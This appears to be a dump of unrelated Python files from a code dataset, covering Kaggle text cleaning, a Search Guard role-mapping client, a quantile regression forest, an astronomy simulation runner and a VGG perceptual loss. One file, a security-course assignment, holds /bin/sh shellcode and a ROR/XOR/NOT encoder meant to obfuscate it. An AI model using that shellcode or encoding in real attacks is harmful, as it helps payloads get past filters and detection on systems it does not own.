"haven't" : "have not",
"havent" : "have not",
"he'd" : "he would",
"he'll" : "he will",
"he's" : "he is",
"i'd" : "I would",
"i'd" : "I had",
"i'll" : "I will",
"i'm" : "I am",
"isn't" : "is not",
"it's" : "it is",
"it'll":"it will",
"i've" : "I have",
"let's" : "let us",
"mightn't" : "might not",
"mustn't" : "must not",
"shan't" : "shall not",
"she'd" : "she would",
"she'll" : "she will",
"she's" : "she is",
"shouldn't" : "should not",
"shouldnt" : "should not",
"that's" : "that is",
"thats" : "that is",
"there's" : "there is",
"theres" : "there is",
"they'd" : "they would",
"they'll" : "they will",
"they're" : "they are",
"theyre": "they are",
"they've" : "they have",
"we'd" : "we would",
"we're" : "we are",
"weren't" : "were not",
"we've" : "we have",
"what'll" : "what will",
"what're" : "what are",
"what's" : "what is",
"what've" : "what have",
"where's" : "where is",
"who'd" : "who would",
"who'll" : "who will",
"who're" : "who are",
"who's" : "who is",
"who've" : "who have",
"won't" : "will not",
"wouldn't" : "would not",
"you'd" : "you would",
"you'll" : "you will",
"you're" : "you are",
"you've" : "you have",
"'re": " are",
"wasn't": "was not",
"we'll":" will",
"didn't": "did not",
"tryin'":"trying"}
def clean_text(x):
x = str(x).replace("\n"," ")
for punct in puncts:
x = x.replace(punct, ' ')
return x
### clean text from the kernel:
### https://www.kaggle.com/mobassir/understanding-cross-lingual-models#Part-2-:-Implementation-using-TPU-Multiprocessing
from nltk.tokenize.treebank import TreebankWordTokenizer
def _get_mispell(mispell_dict):
mispell_re = re.compile('(%s)' % '|'.join(mispell_dict.keys()))
return mispell_dict, mispell_re
def replace_typical_misspell(text):
mispellings, mispellings_re = _get_mispell(mispell_dict)
def replace(match):
return mispellings[match.group(0)]
return mispellings_re.sub(replace, text)
def clean_data(df, columns: list):
for col in columns:
df[col] = df[col].apply(lambda x: clean(x))
df[col] = df[col].apply(lambda x: clean_text(x))
df[col] = df[col].apply(lambda x: replace_typical_misspell(x))
return df
def plot_loss(his, epoch, title):
plt.style.use('ggplot')
plt.figure()
plt.plot(np.arange(0, epoch), his.history['loss'], label='train_loss')
plt.plot(np.arange(0, epoch), his.history['val_loss'], label='val_loss')
plt.title(title)
plt.xlabel('Epoch #')
plt.ylabel('Loss')
plt.legend(loc='upper right')
plt.show()
def plot_auc(his, epoch, title):
plt.style.use('ggplot')
plt.figure()
plt.plot(np.arange(0, epoch), his.history['auc'], label='train_auc')
plt.plot(np.arange(0, epoch), his.history['val_auc'], label='val_auc')
plt.title(title)
plt.xlabel('Epoch #')
plt.ylabel('Loss')
plt.legend(loc='upper right')
plt.show()
### From https://www.kaggle.com/cengc13/jigsaw-tpu-bert-two-stage-training/edit
class TextTransformation:
def __call__(self, text: str, lang: str = None) -> tuple:
        raise NotImplementedError('Abstract')
class LowerCaseTransformation(TextTransformation):
def __call__(self, text: str, lang: str = None) -> tuple:
return text.lower(), lang
class URLTransformation(TextTransformation):
def __call__(self, text: str, lang: str = None) -> tuple:
for url in self.find_urls(text):
if url in text:
                text = text.replace(url, ' external link ')
return text.lower(), lang
@staticmethod
def find_urls(string):
# https://www.geeksforgeeks.org/python-check-url-string/
urls = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', string)
return urls
class PunctuationTransformation(TextTransformation):
def __call__(self, text: str, lang: str = None) -> tuple:
for p in '?!.,"#$%\'()*+-/:;<=>@[\\]^_`{|}~' + '“”’' +"/-'" + "&" + "¡¿":
            if '’' in text:
                text = text.replace('’', f' \' ')
if '—' in text:
text = text.replace('—', f' - ')
if '−' in text:
text = text.replace('−', f' - ')
if '–' in text:
text = text.replace('–', f' - ')
if '“' in text:
text = text.replace('“', f' " ')
if '«' in text:
text = text.replace('«', f' " ')
if '»' in text:
text = text.replace('»', f' " ')
if '”' in text:
text = text.replace('”', f' " ')
if '`' in text:
text = text.replace('`', f' \' ')
text = text.replace(p, f' {p} ')
return text.strip(), lang
class NumericTransformation(TextTransformation):
def __call__(self, text: str, lang: str = None) -> tuple:
for i in range(10):
text = text.replace(str(i), f' {str(i)} ')
return text, lang
class WikiTransformation(TextTransformation):
def __call__(self, text: str, lang: str = None) -> tuple:
text = text.replace('wikiproject', ' wiki project ')
for i in [' vikipedi ', ' wiki ', ' википедии ', " вики ", ' википедия ', ' viki ', ' wikipedien ', ' википедию ']:
text = text.replace(i, ' wikipedia ')
return text, lang
class MessageTransformation(TextTransformation):
def __call__(self, text: str, lang: str = None) -> tuple:
text = text.replace('wikiproject', ' wiki project ')
for i in [' msg ', ' msj ', ' mesaj ']:
text = text.replace(i, ' message ')
return text, lang
class PixelTransformation(TextTransformation):
def __call__(self, text: str, lang: str = None) -> tuple:
for i in [' px ']:
text = text.replace(i, ' pixel ')
return text, lang
class SaleBotTransformation(TextTransformation):
def __call__(self, text: str, lang: str = None) -> tuple:
text = text.replace('salebot', ' sale bot ')
return text, lang
class RuTransformation(TextTransformation):
def __call__(self, text: str, lang: str = None) -> tuple:
if lang is not None and lang == 'ru' and 'http' not in text and 'jpg' not in text and 'wikipedia' not in text:
text = text.replace('t', 'т')
text = text.replace('h', 'н')
text = text.replace('b', 'в')
text = text.replace('c', 'c')
text = text.replace('k', 'к')
text = text.replace('e', 'е')
text = text.replace('a', 'а')
return text, lang
class CombineTransformation(TextTransformation):
def __init__(self, transformations: list, return_lang: bool = False):
self._transformations = transformations
self._return_lang = return_lang
def __call__(self, text: str, lang: str = None) -> tuple:
for transformation in self._transformations:
text, lang = transformation(text, lang)
if self._return_lang:
return text, lang
return text
def append(self, transformation: TextTransformation):
self._transformations.append(transformation)
transformer = CombineTransformation(
[
LowerCaseTransformation(),
PunctuationTransformation(),
NumericTransformation(),
PixelTransformation(),
MessageTransformation(),
WikiTransformation(),
SaleBotTransformation()
]
)
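# Example (sketch): the combined transformation is applied to one comment at a time,
# e.g. `cleaned = transformer("Check the WikiProject page NOW!!!")`, which lower-cases
# the text and pads punctuation and digits with spaces before tokenization.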

# assignment4/rorxornotencode.py
#!/usr/bin/python
# Title: ROR/XOR/NOT encoder
# File: rorxornotencode.py
# Author: <NAME>
# SLAE-681
import sys
ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
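# Optional sanity check (a sketch, not required by the encoder itself): the decoder
# stub must undo the steps in reverse order - NOT, then XOR 0xAA, then ROL by 7 bits.
rol = lambda val, r_bits, max_bits: ror(val, max_bits - r_bits, max_bits)
for _byte in range(256):
    _stored = (~(ror(_byte, 7, 8) ^ 0xAA)) & 0xff
    assert rol(((~_stored) & 0xff) ^ 0xAA, 7, 8) == _byte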
shellcode = (
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)
encoded = ""
encoded2 = ""
print "[*] Encoding shellcode..."
for x in bytearray(shellcode):
# ROR & XOR encoding
z = ror(x, 7, 8)^0xAA
# NOT encoding
y = ~z
if str('%02x' % (y & 0xff)).upper() == "00":
print ">>>>>>>>>> NULL detected in shellcode, aborting."
sys.exit()
if str('%02x' % (y & 0xff)).upper() == "0A":
print ">>>>>>>>>> \\xOA detected in shellcode."
if str('%02x' % (y & 0xff)).upper() == "0D":
print ">>>>>>>>>>> \\x0D detected in shellcode."
encoded += '\\x'
encoded += '%02x' % (y & 0xff)
encoded2 += '0x'
encoded2 += '%02x,' %(y & 0xff)
print "hex version : %s" % encoded
print "nasm version : %s" % encoded2
print "encoded shellcode : %s bytes" % str(len(encoded)/4)
| StarcoderdataPython |
43154 | #!/usr/bin/python3
import requests
import json
import searchguard.settings as settings
from searchguard.exceptions import RoleMappingException, CheckRoleMappingExistsException, ViewRoleMappingException, \
DeleteRoleMappingException, CreateRoleMappingException, ModifyRoleMappingException, CheckRoleExistsException, \
ViewAllRoleMappingException
from searchguard.roles import check_role_exists
PROPERTIES_KEYS = {"users", "backendroles", "hosts"}
def _send_api_request(role, properties):
"""Private function to process API calls for the rolemapping module"""
create_sg_rolemapping = requests.put('{}/rolesmapping/{}'.format(settings.SEARCHGUARD_API_URL, role),
data=json.dumps(properties),
headers=settings.HEADER,
auth=settings.SEARCHGUARD_API_AUTH)
if create_sg_rolemapping.status_code in (200, 201):
# Role mapping created or updated successfully
return
# Error when creating/updating the role mapping
raise RoleMappingException('Error creating/updating the mapping for role {} - msg {}'.format(
role, create_sg_rolemapping.text))
def check_rolemapping_exists(role):
"""Returns True of False depending on whether the requested role mapping exists in Search Guard"""
rolemapping_exists_check = requests.get('{}/rolesmapping/{}'.format(settings.SEARCHGUARD_API_URL, role),
auth=settings.SEARCHGUARD_API_AUTH)
if rolemapping_exists_check.status_code == 200:
# Role mapping exists in SearchGuard
return True
elif rolemapping_exists_check.status_code == 404:
# Role mapping does not exist in SearchGuard
return False
else:
# Could not fetch valid output
raise CheckRoleMappingExistsException('Unknown error checking whether role mapping for {} exists'.format(role))
def view_all_rolemappings():
"""Returns the properties for the requested role mappings if it exists"""
view_all_sg_rolemapping = requests.get('{}/rolesmapping/'.format(settings.SEARCHGUARD_API_URL),
auth=settings.SEARCHGUARD_API_AUTH)
if view_all_sg_rolemapping.status_code == 200:
return json.loads(view_all_sg_rolemapping.text)
else:
# Could not fetch valid output
raise ViewAllRoleMappingException('Unknown error retrieving all role mappings')
def view_rolemapping(role):
"""Returns the properties for the requested role mapping if it exists"""
view_sg_rolemapping = requests.get('{}/rolesmapping/{}'.format(settings.SEARCHGUARD_API_URL, role),
auth=settings.SEARCHGUARD_API_AUTH)
if view_sg_rolemapping.status_code == 200:
return json.loads(view_sg_rolemapping.text)
elif view_sg_rolemapping.status_code == 404:
# Raise exception because the role mapping does not exist
raise ViewRoleMappingException('Error viewing the role mapping for {}, does not exist'.format(role))
else:
# Could not fetch valid output
raise ViewRoleMappingException('Unknown error checking whether role mapping for {} exists'.format(role))
def delete_rolemapping(role):
"""Deletes a Search Guard role mapping. Returns when successfully deleted"""
if check_rolemapping_exists(role):
# The role mapping does exist, let's delete it
delete_sg_rolemapping = requests.delete('{}/rolesmapping/{}'.format(settings.SEARCHGUARD_API_URL, role),
auth=settings.SEARCHGUARD_API_AUTH)
if delete_sg_rolemapping.status_code == 200:
# Role mapping deleted successfully
return
else:
# Raise exception because we could not delete the role mapping
raise DeleteRoleMappingException('Error deleting the role mapping for role {} '
'- msg: {}'.format(role, delete_sg_rolemapping.text))
else:
# Raise exception because the role mapping does not exist
raise DeleteRoleMappingException('Error deleting the role mapping for role {}, does not exist'.format(role))
def create_rolemapping(role, properties):
"""Creates a Search Guard role mapping. Returns when successfully created
It is required to specify at least one of: users, backendroles or hosts in the properties argument.
We do not use the PATCH endpoint for backwards compatibility with Elasticsearch before 6.4.0
:param str role: Name of the role mapping to create in Search Guard
:param dict properties: Search Guard role mapping fields (users, backendroles and/or hosts)
:raises: CreateRoleMappingException, CheckRoleExistsException
"""
if not check_role_exists(role):
raise CheckRoleExistsException('Role {} does not exist'.format(role))
if not any(key in properties for key in PROPERTIES_KEYS):
# Raise exception because we did not receive valid properties
raise CreateRoleMappingException('Error creating mapping for role {} - Include at least one of: users, '
'backendroles or hosts keys in the properties argument'.format(role))
_send_api_request(role, properties)
return
def modify_rolemapping(role, properties, action="replace"):
"""Modifies a Search Guard role mapping. Returns when successfully modified
It is required to specify at least one of: users, backendroles or hosts in the properties argument.
We do not use the PATCH endpoint for backwards compatibility with Elasticsearch before 6.4.0
:param str role: Name of the role mapping to create in Search Guard
:param dict properties: Search Guard role mapping fields (users, backendroles and/or hosts)
:param str action: Defines what to do with the properties. Defaults to replace (overwrites existing
properties). Other options are merge (combine the properties with existing ones) or split
(removes the properties from existing ones)
:raises: ModifyRoleMappingException
"""
if not check_rolemapping_exists(role):
raise ModifyRoleMappingException('Mapping for role {} does not exist'.format(role))
if not any(key in properties for key in PROPERTIES_KEYS):
# Raise exception because we did not receive valid properties
raise ValueError('Error modifying mapping for role {} - Include at least one of: users, '
'backendroles or hosts keys in the properties argument'.format(role))
# Retrieve existing properties of the role mapping:
rolemapping = view_rolemapping(role)
for property in PROPERTIES_KEYS:
if property not in rolemapping[role]:
rolemapping[role][property] = list()
if action is "merge":
# Merge the requested properties with existing properties in the role mapping.
rolemapping[role]['users'] = \
sorted(set(rolemapping[role]['users'] + properties.get('users', [])))
rolemapping[role]['backendroles'] = \
sorted(set(rolemapping[role]['backendroles'] + properties.get('backendroles', [])))
rolemapping[role]['hosts'] = \
sorted(set(rolemapping[role]['hosts'] + properties.get('hosts', [])))
_send_api_request(role, rolemapping[role])
return
if action is "split":
# Remove the requested properties from existing properties in the role mapping.
rolemapping[role]['users'] = [item for item in rolemapping[role]['users']
if item not in properties['users']]
rolemapping[role]['backendroles'] = [item for item in rolemapping[role]['backendroles']
if item not in properties['backendroles']]
rolemapping[role]['hosts'] = [item for item in rolemapping[role]['hosts']
if item not in properties['hosts']]
_send_api_request(role, rolemapping[role])
return
# No merge or split action, overwrite existing properties:
_send_api_request(role, properties)
def list_rolemappings_for_user(user, roles=None, skip_missing_roles=False):
"""Get list of rolemappings that contain the given user. It is possible to add a list of roles to check.
If no list is added, all rolemappings are evaluated. Non-existent roles can be excluded.
:param str user: Name of user
:param list roles: List of rolemappings to be checked for the given user
:param bool skip_missing_roles: Skip missing roles or throw ViewRoleMappingException
:returns list: list of rolemappings with the given user
:raises: ViewRoleMappingException
"""
if roles:
if skip_missing_roles:
user_rolemappings = list()
for role in roles:
try:
if user in view_rolemapping(role)[role]['users']:
user_rolemappings.append(role)
except ViewRoleMappingException:
pass
else:
user_rolemappings = [role for role in roles if user in view_rolemapping(role)[role]['users']]
else:
user_rolemappings = [r for r, p in view_all_rolemappings().items() if user in p['users']]
return sorted(set(user_rolemappings))
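if __name__ == '__main__':
    # Illustrative smoke test; the role name, user and properties below are
    # assumptions and require an existing role plus a reachable Search Guard API
    # configured in searchguard.settings.
    create_rolemapping('sg_logstash', {'users': ['logstash'], 'backendroles': [], 'hosts': []})
    modify_rolemapping('sg_logstash', {'users': ['beats']}, action='merge')
    print(list_rolemappings_for_user('logstash'))
    delete_rolemapping('sg_logstash')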
| StarcoderdataPython |
3284417 | # this file replaces quantile/ensemble.py file of scikit-garden package
# this code, unlike the original code, makes use of all available cores when doing scoring
# also, unlike the original code, predict() function in the new code can generate predictions for multiple quantiles
import numpy as np
from numpy import ma
from sklearn.ensemble.forest import ForestRegressor
from sklearn.utils import check_array
from sklearn.utils import check_random_state
from sklearn.utils import check_X_y
from joblib import Parallel, delayed
from skgarden.quantile.tree import DecisionTreeQuantileRegressor
from skgarden.quantile.ensemble import generate_sample_indices
from ensemble_parallel_utils import weighted_percentile_vectorized
class BaseForestQuantileRegressor(ForestRegressor):
"""Training and scoring of Quantile Regression Random Forest
Training code is the same as in scikit-garden package. Scoring code uses all cores, unlike the original
code in scikit-garden.
Attributes:
y_train_ : array-like, shape=(n_samples,)
Cache the target values at fit time.
y_weights_ : array-like, shape=(n_estimators, n_samples)
y_weights_[i, j] is the weight given to sample ``j` while
estimator ``i`` is fit. If bootstrap is set to True, this
reduces to a 2-D array of ones.
y_train_leaves_ : array-like, shape=(n_estimators, n_samples)
y_train_leaves_[i, j] provides the leaf node that y_train_[i]
ends up when estimator j is fit. If y_train_[i] is given
a weight of zero when estimator j is fit, then the value is -1.
"""
def fit(self, X, y):
"""Builds a forest from the training set (X, y).
Args:
X : array-like or sparse matrix, shape = [n_samples, n_features]
The training input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csc_matrix``.
y : array-like, shape = [n_samples] or [n_samples, n_outputs]
The target values (class labels) as integers or strings.
sample_weight : array-like, shape = [n_samples] or None
Sample weights. If None, then samples are equally weighted. Splits
that would create child nodes with net zero or negative weight are
ignored while searching for a split in each node. Splits are also
ignored if they would result in any single class carrying a
negative weight in either child node.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
X_idx_sorted : array-like, shape = [n_samples, n_features], optional
The indexes of the sorted training input samples. If many tree
are grown on the same dataset, this allows the ordering to be
cached between trees. If None, the data will be sorted here.
Don't use this parameter unless you know what to do.
Returns:
self : object
Returns self.
"""
# apply method requires X to be of dtype np.float32
X, y = check_X_y(X, y, accept_sparse="csc", dtype=np.float32, multi_output=False)
super(BaseForestQuantileRegressor, self).fit(X, y)
self.y_train_ = y
self.y_train_leaves_ = -np.ones((self.n_estimators, len(y)), dtype=np.int32)
self.y_weights_ = np.zeros_like((self.y_train_leaves_), dtype=np.float32)
for i, est in enumerate(self.estimators_):
if self.bootstrap:
bootstrap_indices = generate_sample_indices(est.random_state, len(y))
else:
bootstrap_indices = np.arange(len(y))
est_weights = np.bincount(bootstrap_indices, minlength=len(y))
y_train_leaves = est.y_train_leaves_
for curr_leaf in np.unique(y_train_leaves):
y_ind = y_train_leaves == curr_leaf
self.y_weights_[i, y_ind] = est_weights[y_ind] / np.sum(est_weights[y_ind])
self.y_train_leaves_[i, bootstrap_indices] = y_train_leaves[bootstrap_indices]
return self
def _compute_percentiles(self, x_leaf, quantiles, sorter):
mask = self.y_train_leaves_ != np.expand_dims(x_leaf, 1)
x_weights = ma.masked_array(self.y_weights_, mask)
weights = x_weights.sum(axis=0)
return weighted_percentile_vectorized(self.y_train_, quantiles, weights, sorter)
def predict(self, X, quantiles=None):
"""Predict regression value for X.
Args:
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
quantiles : list of ints, optional
list of value ranging from 0 to 100. By default, the mean is returned.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
Returns:
y : array of shape = [n_samples]
If quantile is set to None, then return E(Y | X). Else return
y such that F(Y=y | x) = quantile.
"""
# apply method requires X to be of dtype np.float32
X = check_array(X, dtype=np.float32, accept_sparse="csc")
if quantiles is None:
return super(BaseForestQuantileRegressor, self).predict(X)
sorter = np.argsort(self.y_train_)
X_leaves = self.apply(X)
with Parallel(n_jobs=-1, backend="multiprocessing", batch_size=10) as p:
percentiles = p(delayed(self._compute_percentiles)(x_leaf, quantiles, sorter) for x_leaf in X_leaves)
return np.array(percentiles)
class RandomForestQuantileRegressor(BaseForestQuantileRegressor):
"""A random forest regressor that provides quantile estimates.
A random forest is a meta estimator that fits a number of classifying
decision trees on various sub-samples of the dataset and use averaging
to improve the predictive accuracy and control over-fitting.
The sub-sample size is always the same as the original
input sample size but the samples are drawn with replacement if
`bootstrap=True` (default).
References:
<NAME>, Quantile Regression Forests
http://www.jmlr.org/papers/volume7/meinshausen06a/meinshausen06a.pdf
Attributes:
estimators_ : list of DecisionTreeQuantileRegressor
The collection of fitted sub-estimators.
feature_importances_ : array of shape = [n_features]
The feature importances (the higher, the more important the feature).
n_features_ : int
The number of features when ``fit`` is performed.
n_outputs_ : int
The number of outputs when ``fit`` is performed.
oob_score_ : float
Score of the training dataset obtained using an out-of-bag estimate.
oob_prediction_ : array of shape = [n_samples]
Prediction computed with out-of-bag estimate on the training set.
"""
def __init__(
self,
n_estimators=10,
criterion="mse",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.0,
max_features="auto",
max_leaf_nodes=None,
bootstrap=True,
oob_score=False,
n_jobs=1,
random_state=None,
verbose=0,
warm_start=False,
):
"""Initialize RandomForestQuantileRegressor class
Args:
n_estimators : integer, optional (default=10)
The number of trees in the forest.
criterion : string, optional (default="mse")
The function to measure the quality of a split. Supported criteria
are "mse" for the mean squared error, which is equal to variance
reduction as feature selection criterion, and "mae" for the mean
absolute error.
.. versionadded:: 0.18
Mean Absolute Error (MAE) criterion.
max_features : int, float, string or None, optional (default="auto")
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=n_features`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_depth : integer or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
min_samples_split : int, float, optional (default=2)
The minimum number of samples required to split an internal node:
- If int, then consider `min_samples_split` as the minimum number.
- If float, then `min_samples_split` is a percentage and
`ceil(min_samples_split * n_samples)` are the minimum
number of samples for each split.
.. versionchanged:: 0.18
Added float values for percentages.
min_samples_leaf : int, float, optional (default=1)
The minimum number of samples required to be at a leaf node:
- If int, then consider `min_samples_leaf` as the minimum number.
- If float, then `min_samples_leaf` is a percentage and
`ceil(min_samples_leaf * n_samples)` are the minimum
number of samples for each node.
.. versionchanged:: 0.18
Added float values for percentages.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the sum total of weights (of all
the input samples) required to be at a leaf node. Samples have
equal weight when sample_weight is not provided.
max_leaf_nodes : int or None, optional (default=None)
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
bootstrap : boolean, optional (default=True)
Whether bootstrap samples are used when building trees.
oob_score : bool, optional (default=False)
whether to use out-of-bag samples to estimate
the R^2 on unseen data.
n_jobs : integer, optional (default=1)
The number of jobs to run in parallel for both `fit` and `predict`.
If -1, then the number of jobs is set to the number of cores.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
verbose : int, optional (default=0)
Controls the verbosity of the tree building process.
warm_start : bool, optional (default=False)
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just fit a whole
new forest.
"""
super(RandomForestQuantileRegressor, self).__init__(
base_estimator=DecisionTreeQuantileRegressor(),
n_estimators=n_estimators,
estimator_params=(
"criterion",
"max_depth",
"min_samples_split",
"min_samples_leaf",
"min_weight_fraction_leaf",
"max_features",
"max_leaf_nodes",
"random_state",
),
bootstrap=bootstrap,
oob_score=oob_score,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start,
)
self.criterion = criterion
self.max_depth = max_depth
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_features = max_features
self.max_leaf_nodes = max_leaf_nodes
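# Minimal usage sketch (synthetic data; the estimator settings, quantiles and the
# assumed (n_samples, n_quantiles) output layout are illustrative, not prescribed
# by the original module):
if __name__ == "__main__":
    rng = np.random.RandomState(0)
    X_demo = rng.uniform(size=(200, 3)).astype(np.float32)
    y_demo = X_demo[:, 0] + 0.1 * rng.normal(size=200)
    rfqr = RandomForestQuantileRegressor(n_estimators=20, random_state=0)
    rfqr.fit(X_demo, y_demo)
    print(rfqr.predict(X_demo[:5], quantiles=[5, 50, 95]))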
| StarcoderdataPython |
147997 | #!/usr/bin/env python
"""create_min_chi2_table.py.
Create Table of minimum Chi_2 values and save to a table.
"""
import argparse
import logging
import sys
from joblib import Parallel, delayed
from logutils import BraceMessage as __
from bin.coadd_analysis_script import main as coadd_analysis
from bin.coadd_chi2_db import main as coadd_db
from simulators.iam_script import main
def parse_args(args):
"""Take care of all the argparse stuff.
:returns: the args
"""
parser = argparse.ArgumentParser(description='Do iam simulations on stars.')
parser.add_argument('star', help='Star names', default=None)
parser.add_argument('--suffix', help='Suffix to add to the file names.', default="")
parser.add_argument("-n", "--n_jobs", help="Number of parallel Jobs", default=1, type=int)
parser.add_argument('-v', '--verbose', action="store_true",
help='Turn on Verbose.')
return parser.parse_args(args)
if __name__ == "__main__":
args = parse_args(sys.argv[1:])
star = args.star
    n_jobs = args.n_jobs  # argparse.Namespace has no .pop(); read the attributes directly
    verbose = args.verbose
logging.info(__("Performing simulations on", star))
obsnums = {"HD30501": ["1", "2a", "2b", "3"], "HD211847": ["1", "2"], "HD4747": ["1"]}
def parallelized_main(opts, chip):
"""Run main with different chips in parallel."""
opts["chip"] = chip
return main(**opts)
for obs in obsnums[star]:
iam_opts = {"star": star, "obsnum": obs, "parallel": False, "more_id": args.suffix}
res = Parallel(n_jobs=n_jobs)(delayed(parallelized_main)(iam_opts, chip)
for chip in range(1, 5))
if not sum(res):
print("\nDoing analysis after simulations!\n")
coadd_db(star, obs, args.suffix, replace=True,
verbose=verbose, move=True)
coadd_analysis(star, obs, suffix=args.suffix,
echo=False, mode="all", verbose=verbose, npars=3)
print("\nFinished the db analysis after iam_script simulations!\n")
sys.exit(0)
| StarcoderdataPython |
1622780 | <reponame>sokazaki/mmediting
import torch
import torch.nn as nn
import torchvision.models.vgg as vgg
from mmcv.runner import load_checkpoint
from mmedit.utils import get_root_logger
from ..registry import LOSSES
class PerceptualVGG(nn.Module):
"""VGG network used in calculating perceptual loss.
In this implementation, we allow users to choose whether use normalization
in the input feature and the type of vgg network. Note that the pretrained
path must fit the vgg type.
Args:
layer_name_list (list[str]): According to the name in this list,
forward function will return the corresponding features. This
            list contains the name of each layer in `vgg.features`. An example
of this list is ['4', '10'].
vgg_type (str): Set the type of vgg network. Default: 'vgg19'.
use_input_norm (bool): If True, normalize the input image.
Importantly, the input feature must in the range [0, 1].
Default: True.
pretrained (str): Path for pretrained weights. Default:
'torchvision://vgg19'
"""
def __init__(self,
layer_name_list,
vgg_type='vgg19',
use_input_norm=True,
pretrained='torchvision://vgg19'):
super().__init__()
if pretrained.startswith('torchvision://'):
assert vgg_type in pretrained
self.layer_name_list = layer_name_list
self.use_input_norm = use_input_norm
# get vgg model and load pretrained vgg weight
# remove _vgg from attributes to avoid `find_unused_parameters` bug
_vgg = getattr(vgg, vgg_type)()
self.init_weights(_vgg, pretrained)
num_layers = max(map(int, layer_name_list)) + 1
assert len(_vgg.features) >= num_layers
# only borrow layers that will be used from _vgg to avoid unused params
self.vgg_layers = _vgg.features[:num_layers]
if self.use_input_norm:
# the mean is for image with range [0, 1]
self.register_buffer(
'mean',
torch.Tensor([0.485, 0.456, 0.406]).view(1, 3, 1, 1))
            # the std is for image with range [0, 1]
self.register_buffer(
'std',
torch.Tensor([0.229, 0.224, 0.225]).view(1, 3, 1, 1))
for v in self.vgg_layers.parameters():
v.requires_grad = False
def forward(self, x):
"""Forward function.
Args:
x (Tensor): Input tensor with shape (n, c, h, w).
Returns:
Tensor: Forward results.
"""
if self.use_input_norm:
x = (x - self.mean) / self.std
output = {}
for name, module in self.vgg_layers.named_children():
x = module(x)
if name in self.layer_name_list:
output[name] = x.clone()
return output
def init_weights(self, model, pretrained):
"""Init weights.
Args:
model (nn.Module): Models to be inited.
pretrained (str): Path for pretrained weights.
"""
logger = get_root_logger()
load_checkpoint(model, pretrained, logger=logger)
@LOSSES.register_module()
class PerceptualLoss(nn.Module):
"""Perceptual loss with commonly used style loss.
Args:
        layer_weights (dict): The weight for each layer of vgg feature.
Here is an example: {'4': 1., '9': 1., '18': 1.}, which means the
5th, 10th and 18th feature layer will be extracted with weight 1.0
            in calculating losses.
vgg_type (str): The type of vgg network used as feature extractor.
Default: 'vgg19'.
use_input_norm (bool): If True, normalize the input image in vgg.
Default: True.
perceptual_weight (float): If `perceptual_weight > 0`, the perceptual
            loss will be calculated and the loss will be multiplied by the
weight. Default: 1.0.
style_weight (float): If `style_weight > 0`, the style loss will be
            calculated and the loss will be multiplied by the weight.
Default: 1.0.
norm_img (bool): If True, the image will be normed to [0, 1]. Note that
            this is different from the `use_input_norm` which normalizes the input
            in the forward function of vgg according to the statistics of the dataset.
Importantly, the input image must be in range [-1, 1].
pretrained (str): Path for pretrained weights. Default:
'torchvision://vgg19'
"""
def __init__(self,
layer_weights,
vgg_type='vgg19',
use_input_norm=True,
perceptual_weight=1.0,
style_weight=1.0,
norm_img=True,
pretrained='torchvision://vgg19',
criterion='l1'):
super().__init__()
self.norm_img = norm_img
self.perceptual_weight = perceptual_weight
self.style_weight = style_weight
self.layer_weights = layer_weights
self.vgg = PerceptualVGG(
layer_name_list=list(layer_weights.keys()),
vgg_type=vgg_type,
use_input_norm=use_input_norm,
pretrained=pretrained)
if criterion == 'l1':
self.criterion = torch.nn.L1Loss()
elif criterion == 'mse':
self.criterion = torch.nn.MSELoss()
else:
raise NotImplementedError(
f'{criterion} criterion has not been supported in'
' this version.')
def forward(self, x, gt):
"""Forward function.
Args:
x (Tensor): Input tensor with shape (n, c, h, w).
gt (Tensor): Ground-truth tensor with shape (n, c, h, w).
Returns:
Tensor: Forward results.
"""
if self.norm_img:
x = (x + 1.) * 0.5
gt = (gt + 1.) * 0.5
# extract vgg features
x_features = self.vgg(x)
gt_features = self.vgg(gt.detach())
# calculate perceptual loss
if self.perceptual_weight > 0:
percep_loss = 0
for k in x_features.keys():
percep_loss += self.criterion(
x_features[k], gt_features[k]) * self.layer_weights[k]
percep_loss *= self.perceptual_weight
else:
percep_loss = None
# calculate style loss
if self.style_weight > 0:
style_loss = 0
for k in x_features.keys():
style_loss += self.criterion(
self._gram_mat(x_features[k]),
self._gram_mat(gt_features[k])) * self.layer_weights[k]
style_loss *= self.style_weight
else:
style_loss = None
return percep_loss, style_loss
def _gram_mat(self, x):
"""Calculate Gram matrix.
Args:
x (torch.Tensor): Tensor with shape of (n, c, h, w).
Returns:
torch.Tensor: Gram matrix.
"""
(n, c, h, w) = x.size()
features = x.view(n, c, w * h)
features_t = features.transpose(1, 2)
gram = features.bmm(features_t) / (c * h * w)
return gram
